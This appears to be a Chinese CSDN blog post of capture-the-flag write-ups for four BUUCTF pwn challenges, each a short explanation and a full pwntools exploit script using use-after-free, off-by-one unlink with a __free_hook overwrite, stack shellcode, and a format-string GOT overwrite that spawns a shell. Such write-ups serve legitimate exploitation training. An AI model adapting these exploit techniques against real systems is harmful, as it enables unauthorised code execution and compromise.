PWN-PRACTICE-BUUCTF-23

最新推荐文章于 2024-02-20 00:57:52 发布
最新推荐文章于 2024-02-20 00:57:52 发布
阅读量665 收藏
点赞数
分类专栏: Pwn-BUUCTF 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/120196357
版权

PWN-PRACTICE-BUUCTF-23

gyctf_2020_some_thing_exceting

程序读取了flag到bss段上的0x6020A8地址处
存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free
再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出flag

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./gyctf_2020_some_thing_exceting")
io=remote("node4.buuoj.cn",29559)
elf=ELF("./gyctf_2020_some_thing_exceting")
libc=ELF("./libc-2.23.so")
flag_addr=0x6020A8

def add(ba_len,ba,na_len,na):
	io.sendlineafter("> Now please tell me what you want to do :","1")
	io.sendlineafter("> ba's length : ",str(ba_len))
	io.sendlineafter("> ba : ",ba)
	io.sendlineafter("> na's length : ",str(na_len))
	io.sendlineafter("> na : ",na)
def edit():
	io.sendlineafter("> Now please tell me what you want to do :","2")
def free(index):
	io.sendlineafter("> Now please tell me what you want to do :","3")
	io.sendlineafter("> Banana ID : ",str(index))
def show(index):
	io.sendlineafter("> Now please tell me what you want to do :","4")
	io.sendlineafter("> SCP project ID : ",str(index))
def exit():
	io.sendlineafter("> Now please tell me what you want to do :","5")
	
#gdb.attach(io)
#pause()

add(0x10,"aaaa",0x20,"bbbb")#0
add(0x20,"cccc",0x20,"dddd")#1

#pause()

free(1)

#pause()

free(0)

#pause()

add(0x10,"eeee",0x10,p64(flag_addr)*2)#2

#pause()

show(1)

exit()

io.interactive()

axb_2019_heap

elf,保护全开,不能通过got改写地址,也不知道程序的基地址
利用格式化字符串漏洞泄露libc基址和main基址
输入content的get_input函数存在obo漏洞,可构成unlink
参考:buuctf axb_2019_heap

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./axb_2019_heap")
io=remote("node4.buuoj.cn",27073)
elf=ELF("./axb_2019_heap")
libc=ELF("./libc-2.23-16-x64.so")

def add(index,size,content):
	io.sendlineafter("Enter a option: \n>> ","1")
	io.sendlineafter("Enter the index you want to create (0-10):",str(index))
	io.sendlineafter("Enter a size:\n",str(size))
	io.sendlineafter("Enter the content: \n",content)
def free(index):
	io.sendlineafter("Enter a option: \n>> ","2")
	io.sendlineafter("Enter an index:\n",str(index))
def show():
	io.sendlineafter("Enter a option: \n>> ","3")
def edit(index,content):
	io.sendlineafter("Enter a option: \n>> ","4")
	io.sendlineafter("Enter an index:\n",str(index))
	io.sendlineafter("Enter the content: \n",content)

io.recvuntil("Enter your name: ")
payload="%15$p%19$p"
io.sendline(payload)
io.recvuntil("0x")
libc_base=int(io.recvuntil("0x")[:-2],16)-240-libc.sym["__libc_start_main"]
main_base=int(io.recvuntil("\n")[:-1],16)-0x000000000000116A
print("libc_base=="+hex(libc_base))
print("main_base=="+hex(main_base))
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]
note=main_base+0x202060

#gdb.attach(io)
#pause()

add(0,0x98,"a"*0x98)#0
add(1,0x90,"bbbb")#1
add(2,0x90,"/bin/sh\x00")#2

#pause()

payload=p64(0)+p64(0x91)+p64(note-0x18)+p64(note-0x10)
payload=payload.ljust(0x90,"a")
payload+=p64(0x90)+p8(0xa0)
edit(0,payload)

#pause()

free(1)

#pause()

payload=p64(0)*3+p64(free_hook)+p64(0x08)
edit(0,payload)

#pause()

edit(0,p64(system))

#pause()

free(2)

io.interactive()

[极客大挑战 2019]Not Bad

NX disabled,堆栈可执行
程序调用mmap函数在地址0x123000处开辟了一块0x1000大小的堆块
sub_400A16函数中可造成栈溢出,在栈上布局shellcode,调整栈顶指针rsp,使之能够指向shellcode
读取当前目录下的flag文件到0x123000+0x100处,调用write打印出flag
打开的flag文件的文件描述符按0,1,2的顺序加1,即为3

# -*- coding:utf-8 -*-
from pwn import *
context.arch="amd64"
context.os="linux"
#io=process("./bad")
io=remote("node4.buuoj.cn",27593)
elf=ELF("./bad")
mmap_addr=0x123000
jmp_rsp=0x400A01
io.recvuntil("Easy shellcode, have fun!\n")
payload=asm(shellcraft.read(0,mmap_addr,0x100))+asm("mov rax,0x123000;call rax")
payload=payload.ljust(32+8,"\x00")
payload+=p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp")
io.sendline(payload)
payload=shellcraft.open("./flag")
payload+=shellcraft.read(3,mmap_addr+0x100,0x50)
payload+=shellcraft.write(1,mmap_addr+0x100,0x50)
payload=asm(payload)
io.sendline(payload)
io.interactive()

inndy_echo

格式化字符串漏洞,输入的偏移为7
通过printf_got泄露出printf的真实地址,进而得到libc基地址,计算system真实地址
通过printf_got修改printf真实地址为system的真实地址
输入"/bin/sh\x00",即可执行system("/bin/sh\x00")

from pwn import *
context.log_level='debug'
#io=process('./inndy_echo')
io=remote("node4.buuoj.cn",28404)
elf=ELF('./inndy_echo')
printf_got=elf.got["printf"]
payload=p32(printf_got)+"%7$s"
io.sendline(payload)
printf_addr=u32(io.recvuntil('\xf7')[-4:])
print("printf_addr=="+hex(printf_addr))
libc=ELF('./libc-2.23-x32.so')
libc_base=printf_addr-libc.sym["printf"]
system_addr=libc_base+libc.sym['system']
print("system_addr=="+hex(system_addr))
payload=fmtstr_payload(7,{printf_got:system_addr})
io.sendline(payload)
io.sendline('/bin/sh\x00')
io.interactive()
P1umH0
关注
专栏目录
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2135
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 481
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
axb_2019_heap详解
像初雪一样自由洒落
04-25 653
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 838
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 377
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
最新发布
2301_79326813的博客
02-20 545
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
axb_2019_heap【write up】
m0_73756460的博客
04-08 84
buu刷题 axb_2019_heap【write up】
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1286
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)
半岛铁盒的博客
04-05 455
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 882
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1605
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
cmcc_simplerop
doudoudedi
02-20 1076
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
pwn】 gyctf_2020_borrowstack
Nothing
03-02 1662
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF[极客大挑战 2019]LoveSQL
../../../../../../../
06-11 264
打开发现用户登录界面,尝试一下万能密码 跳转到check界面并得到登录名及密码 尝试解码,解码失败,进行注入 先查询字段数 ?username=admin%27+order+by+3%23&password=1 页面回显成功,再试试4 ?username=admin%27+order+by+4%23&password=1 注:在url进行查询,#要用url编码%23代替 页面回显失败,可以知道有三个字段 接着我们利用union select 进行回显点查询 ?username=1
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 758
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
BUUCTF-WEB-[极客大挑战 2019]Upload
r1727337824的博客
09-06 549
BUUCTF-WEB-[极客大挑战 2019]Upload》
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值